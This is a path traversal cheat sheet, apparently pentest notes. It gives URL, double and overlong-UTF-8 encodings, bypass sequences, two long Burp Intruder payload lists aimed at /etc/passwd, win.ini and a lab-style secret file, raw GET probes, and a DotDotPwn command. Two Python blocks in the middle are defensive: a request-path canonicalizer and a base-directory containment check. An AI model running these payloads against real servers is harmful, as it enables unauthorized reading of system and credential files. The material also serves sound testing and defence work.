
Path Traversal

Path traversal attacks

A directory traversal vulnerability can be present inside a web server, inside an application framework (during the HTTP request pre-processing and routing), or within an application endpoint that processes data according to application logic (for example, reading a file from storage based on its name).

Platform - Filename and Path

You need to figure out the platform in order to know how to address specific files. On Linux, a good file to read is /etc/passwd, which is always readable. On Windows, you can choose C:\Windows\win.ini.

Simple

../../../etc/passwd

URL encoding

. = %2e
/ = %2f
\ = %5c

Double URL encoding

. = %252e
/ = %252f
\ = %255c

UTF-8 Unicode (overlong encodings)

. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c

16-bit Unicode (%u encoding)

. = %u002e
/ = %u2215
\ = %u2216

Bypass Path Sequence

../
.../
..../
..\
..\/
..;/
..././
...\.\
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
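Every entry in the encoding tables and the bypass list above is the same `../` (or `..\`) once a server's decoding layers have run, so a filter that inspects the raw request string is checking the wrong thing. The following Python is an added example, not code from the original page: it reproduces those decoding layers (repeated percent-decoding, IIS-style %uXXXX, overlong UTF-8 through a permissive decoder, NFKC folding of full-width characters, the `;` path-parameter trick and the dots-only segments) to reduce a request path to its canonical form and report why it looks like traversal. The function names (`lenient_utf8`, `decode_once`, `canonicalize`, `traversal_findings`) and the sample inputs are this example's own. It suits log review or a WAF-style pre-filter; it does not replace the containment check the application must do on the decoded path.

```python
import re
import unicodedata
import urllib.parse
from typing import List

# Unicode look-alikes of path metacharacters that NFKC does not fold by itself
# (the %u2215 / %u2216 forms listed above). Full-width U+FF0E / U+FF0F / U+FF3C
# are handled by NFKC.
HOMOGLYPHS = {
    "\u2215": "/",   # DIVISION SLASH
    "\u2216": "\\",  # SET MINUS
}

# A segment made only of two or more dots: '..', '...', '....'. The longer
# ones survive a single, non-recursive '../' strip and then collapse to '..'.
DOT_SEGMENT = re.compile(r"^\.{2,}$")


def lenient_utf8(data: bytes) -> str:
    """Decode bytes the way a permissive legacy server did: ordinary UTF-8 plus
    the overlong 2- and 3-byte forms (%c0%ae, %e0%80%af) that a strict decoder
    rejects. Bytes that fit no pattern are mapped one-to-one (Latin-1)."""
    def cont(i: int, n: int) -> bool:   # do n continuation bytes follow data[i]?
        return i + n < len(data) and all(0x80 <= c <= 0xBF for c in data[i + 1:i + n + 1])

    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and cont(i, 1):        # 2-byte form, overlong C0/C1 included
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        elif 0xE0 <= b <= 0xEF and cont(i, 2):      # 3-byte form, overlong E0 80 xx included
            out.append(chr(((b & 0x0F) << 12) | ((data[i + 1] & 0x3F) << 6) | (data[i + 2] & 0x3F)))
            i += 3
        elif 0xF0 <= b <= 0xF3 and cont(i, 3):      # 4-byte form, keeps planes 1-15 intact
            out.append(chr(((b & 0x07) << 18) | ((data[i + 1] & 0x3F) << 12)
                           | ((data[i + 2] & 0x3F) << 6) | (data[i + 3] & 0x3F)))
            i += 4
        else:                                        # ASCII or a stray byte, mapped 1:1
            out.append(chr(b))
            i += 1
    return "".join(out)


def _u_escape(m: "re.Match[str]") -> str:
    cp = int(m.group(1), 16)
    return m.group(0) if 0xD800 <= cp <= 0xDFFF else chr(cp)   # leave lone surrogates alone


def decode_once(s: str) -> str:
    """One decoding layer: IIS-style %uXXXX first, then %XX, with the resulting
    bytes run through the permissive decoder instead of a strict UTF-8 one."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", _u_escape, s)
    return lenient_utf8(urllib.parse.unquote_to_bytes(s))


def canonicalize(s: str, max_rounds: int = 3) -> str:
    """Peel percent-encoding layers until the string stops changing (single,
    double, triple encoding), fold Unicode look-alikes, unify separators."""
    for _ in range(max_rounds):
        decoded = decode_once(s)
        if decoded == s:
            break
        s = decoded
    s = unicodedata.normalize("NFKC", s)               # U+FF0E -> '.', U+FF0F -> '/'
    s = "".join(HOMOGLYPHS.get(ch, ch) for ch in s)    # U+2215 -> '/', U+2216 -> '\'
    return s.replace("\\", "/")


def traversal_findings(user_path: str) -> List[str]:
    """Return the reasons a request path looks like traversal (empty list = clean)."""
    findings = []
    canon = canonicalize(user_path)
    if "\x00" in canon:
        findings.append("null byte")
    for seg in canon.split("/"):
        seg = seg.split(";", 1)[0]    # '..;/' is '..' plus a path parameter to Tomcat
        if DOT_SEGMENT.match(seg):
            findings.append(f"dot segment {seg!r}")
    return findings


if __name__ == "__main__":
    # Constructed sample request paths, one per encoding family from the tables.
    for probe in ["images/cat.jpg", "%252e%252e%252fetc%252fpasswd", "%c0%ae%c0%ae%c0%afetc/passwd",
                  "%uff0e%uff0e%u2215etc%u2215passwd", "..;/..;/etc/passwd", "etc/passwd%00.jpg"]:
        print(f"{probe:40} -> {canonicalize(probe)!r:30} {traversal_findings(probe)}")
```

The decoding loop stops as soon as a round changes nothing, so a legitimate name containing a literal `%` is left alone after the first pass, while double- and triple-encoded sequences are unwrapped to the same `../` that the page's single-encoded forms produce.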

Intruder

Don't forget to disable payload URL encoding in Intruder for both of the next payload lists (Payload 1, Payload 2); otherwise Burp re-encodes the sequences and the tests no longer exercise the server's own decoding.

Payload 1 - Traversal directory sequence, deep 6

../
../../
../../../
../../../../
../../../../../
../../../../../../
.../
.../.../
.../.../.../
.../.../.../.../
.../.../.../.../.../
.../.../.../.../.../.../
...//
...//...//
...//...//...//
...//...//...//...//
...//...//...//...//...//
...//...//...//...//...//...//
....//....//
....//....//....//
....//....//....//....//
....//....//....//....//....//
....//....//....//....//....//....//
..\
..\..\
..\..\..\
..\..\..\..\
..\..\..\..\..\
..\..\..\..\..\..\
...\
...\...\
...\...\...\
...\...\...\...\
...\...\...\...\...\
...\...\...\...\...\...\
....\\....\\
....\\....\\....\\
....\\....\\....\\....\\
....\\....\\....\\....\\....\\
....\\....\\....\\....\\....\\....\\
....\/
....\/....\/
....\/....\/....\/
....\/....\/....\/....\/
....\/....\/....\/....\/....\/
....\/....\/....\/....\/....\/....\/
..\/
..\/..\/
..\/..\/..\/
..\/..\/..\/..\/
..\/..\/..\/..\/..\/
..\/..\/..\/..\/..\/..\/
..;/
..;/..;/
..;/..;/..;/
..;/..;/..;/..;/
..;/..;/..;/..;/..;/
..;/..;/..;/..;/..;/..;/
..././
..././..././
..././..././..././
..././..././..././..././
..././..././..././..././..././
..././..././..././..././..././..././
...\.\
...\.\...\.\
...\.\...\.\...\.\
...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\
...\.\...\.\...\.\...\.\...\.\...\.\
%2e%2e%2f
%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f
%252e%252e%252f
%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f
..%c0%af
..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af
..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f..%ef%bc%8f
%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216

Payload 2 - Filename

etc/passwd
etc/passwd%00
etc/passwd%00.jpg
etc/passwd%00.png
etc//passwd
etc\passwd
etc\\passwd
etc%2fpasswd
etc%252fpasswd
etc%c0%afpasswd
etc%c0%af%e0%80%afpasswd
etc%c0%2fpasswd
etc%c0%5cpasswd
etc%c0%80%5cpasswd
etc%u2215passwd
etc%u2216passwd
home/carlos/secret
home/carlos/secret%00
home/carlos/secret%00.jpg
home/carlos/secret%00.png
home//carlos//secret
home\carlos\secret
home\\carlos\\secret
home%2fcarlos%2fsecret
home%252fcarlos%252fsecret
home%c0%afcarlos%c0%afsecret
home%c0%af%e0%80%afcarlos%c0%af%e0%80%afsecret
home%c0%2fcarlos%c0%2fsecret
home%c0%5ccarlos%c0%5csecret
home%c0%80%5ccarlos%c0%80%5csecret
home%u2215carlos%u2215secret
home%u2216carlos%u2216secret
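The file-name variants above (null bytes, doubled and backslash separators, single and double encoding) all target a server that validates one string and opens another. The safe pattern is to decode exactly once, resolve the path on the filesystem, and prove the result still lies below the allowed base directory. The Python below is an added example, not code from the original page; `resolve_under` and `demo` are names chosen here, and the files `demo` creates in a temporary directory are constructed for the demonstration.

```python
import os
import tempfile
import urllib.parse
from typing import Dict, Optional


def resolve_under(base_dir: str, user_path: str) -> Optional[str]:
    """Map a client-supplied relative path to a real file below base_dir.
    Returns None when the request must be refused."""
    # Decode exactly once. A second unquote() here is what turns the
    # %252e%252e%252f payloads back into ../, so never re-decode later.
    decoded = urllib.parse.unquote(user_path)
    # %00 payloads rely on a C string terminator cutting the name off after an
    # extension check; refuse embedded NULs outright.
    if "\x00" in decoded:
        return None
    # Treat backslash as a separator on every OS so etc\passwd and
    # etc%5cpasswd are not waved through by a '/'-only check.
    decoded = decoded.replace("\\", "/").lstrip("/")
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, decoded))
    # realpath collapses '..' and follows symlinks; commonpath then proves the
    # result is still inside base. A plain startswith() would wrongly accept
    # '/srv/files_evil' as being under '/srv/files'.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> Dict[str, bool]:
    """Constructed sandbox: base/docs/readme.txt, a file one level above the
    base, and a symlink inside the base that points above it. Returns, per
    probe, whether the containment check accepted the request."""
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "files")
        os.makedirs(os.path.join(base, "docs"))
        with open(os.path.join(base, "docs", "readme.txt"), "w") as fh:
            fh.write("public document\n")
        with open(os.path.join(tmp, "outside.txt"), "w") as fh:
            fh.write("must never be served\n")
        try:
            os.symlink(tmp, os.path.join(base, "escape"))   # points above base
            symlink_ok = True
        except OSError:
            symlink_ok = False   # no symlink privilege (e.g. Windows): skip that probe
        probes = [
            "docs/readme.txt",                 # legitimate
            "docs/../docs/readme.txt",         # '..' that stays inside base: fine
            "../../etc/passwd",                # classic traversal
            "..%2f..%2fetc%2fpasswd",          # single URL encoding
            "..\\outside.txt",                 # backslash separator, real file above base
            "docs/readme.txt%00.jpg",          # null-byte extension trick
            "%252e%252e%252fetc%252fpasswd",   # double encoding: an odd literal name, not traversal
        ]
        if symlink_ok:
            probes.append("escape/outside.txt")   # symlink pointing out of base
        return {p: resolve_under(base, p) is not None for p in probes}


if __name__ == "__main__":
    for probe, accepted in demo().items():
        print(f"{probe:35} {'accepted' if accepted else 'refused'}")
```

The double-encoded probe is accepted by the containment check because after a single decode it is just an unusual literal filename under the base; it only becomes `../` if something decodes it a second time, and since no such file exists the request still fails with a not-found rather than a disclosure. The symlink probe shows why `realpath` must run before the comparison: the lexical path `escape/outside.txt` looks like it is under the base, but the resolved path is not.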

Web Server Path Traversal Attacks

GET C:/Windows/win.ini
GET /C:/Windows/win.ini
GET file:///Windows/win.ini
GET /~/Windows/win.ini

Tools

DotDotPwn

dotdotpwn -m http-url -u https://example.com/TRAVERSAL -f /etc/passwd -k root  

References

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal
https://gracefulsecurity.com/path-traversal-cheat-sheet-linux/
https://www.kali.org/tools/dotdotpwn/

Last updated 2 years ago